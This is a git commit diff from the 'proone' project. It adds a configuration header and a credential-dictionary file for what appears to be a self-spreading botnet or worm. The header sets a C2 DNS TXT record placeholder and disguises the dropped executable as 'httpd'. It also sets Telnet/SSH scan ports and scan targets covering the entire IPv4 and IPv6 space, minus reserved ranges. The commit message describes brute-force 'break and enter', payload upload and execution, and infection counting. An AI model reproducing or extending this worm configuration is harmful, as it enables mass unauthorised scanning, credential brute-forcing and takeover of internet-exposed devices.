From 86038b950f0aaddca7108e903568159414a8d64a Mon Sep 17 00:00:00 2001 From: David Timber Date: Sun, 27 Sep 2020 22:51:11 +0930 Subject: * Disable armv7, aarch64, x86_64 target * Apply recon and bne to proone * Add callback contexts on htbt and bne * Fix mem leak in bne_sh_cleanup_upload() * Use prne_static_assert() instead of _Static_assert() * Use prne_free_worker() rather than calling free_ctx() * Add prne_eq_ipaddr() * bne * Add prne_bne_result::ny_instance to impl infect_cnt * Don't delete tmp upload dir after successful bne_sh_run_exec() so that proone can make tmp files * Silently ignore PRNE_BNE_V_HTBT if htbt_ssl_conf is not set * Add prne_bne_get_subject() * htbt * Fix crash bug when running without resolv * proone: set pth priority --- src/proone_conf.skel/config.h | 66 +++++++++++++++++++++++++++++++++++++- src/proone_conf.skel/cred_dict.txt | 1 + 2 files changed, 66 insertions(+), 1 deletion(-) create mode 100644 src/proone_conf.skel/cred_dict.txt (limited to 'src/proone_conf.skel') diff --git a/src/proone_conf.skel/config.h b/src/proone_conf.skel/config.h index c70c795..2e9b39e 100644 --- a/src/proone_conf.skel/config.h +++ b/src/proone_conf.skel/config.h @@ -1 +1,65 @@ -#define PRNE_CNC_TXT_REC "CHANGE.ME.test" +#pragma once +#define PRNE_CNC_TXT_REC "CHANGE.ME.test" +#define PRNE_BNE_LOGIN_ATTEMPT 0 +#define PRNE_BNE_EXEC_NAME "httpd" + +#define PRNE_RCN_PORTS {\ + /* 22 */ 0x00, 0x16,\ + /* 23 */ 0x00, 0x17,\ + /* 2323 */ 0x09, 0x13\ +} + +// Array of 5 byte elements: 4 byte IPv4 address followed by cidr +#define PRNE_RCN_T_IPV4 {\ + /* 0.0.0.0/0 */ 0, 0, 0, 0, 0\ +} + +#define PRNE_RCN_BL_IPV4 {\ + /* current net */ 0, 0, 0, 0, 8,\ + /* loopback */ 127,0, 0, 0, 8,\ + /* link-local */ 169,254,0, 0, 16,\ + /* multicast */ 224,0, 0, 0, 4\ +} + +// Array of 17 byte elements: 16 byte IPv6 address followed by cidr +#define PRNE_RCN_T_IPV6 {\ + /* ::/0 */\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 0\ +} + +#define PRNE_RCN_BL_IPV6 {\ + /* unknown */\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 128,\ + /* loopback */\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,\ + 128,\ + /* IPv4 mapped */\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,\ + 96,\ + /* IPv4 translated */\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 96,\ + /* IPv4/IPv6 translation */\ + 0x00, 0x64, 0xff, 0x9b, 0x00, 0x00, 0x00, 0x00,\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 96,\ + /* routing discard */\ + 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 64,\ + /* link-local */\ + 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 10,\ + /* multicast */\ + 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ + 8\ +} diff --git a/src/proone_conf.skel/cred_dict.txt b/src/proone_conf.skel/cred_dict.txt new file mode 100644 index 0000000..28a6c30 --- /dev/null +++ b/src/proone_conf.skel/cred_dict.txt @@ -0,0 +1 @@ +# Sample:/src/data/cred_dict.sample.txt -- cgit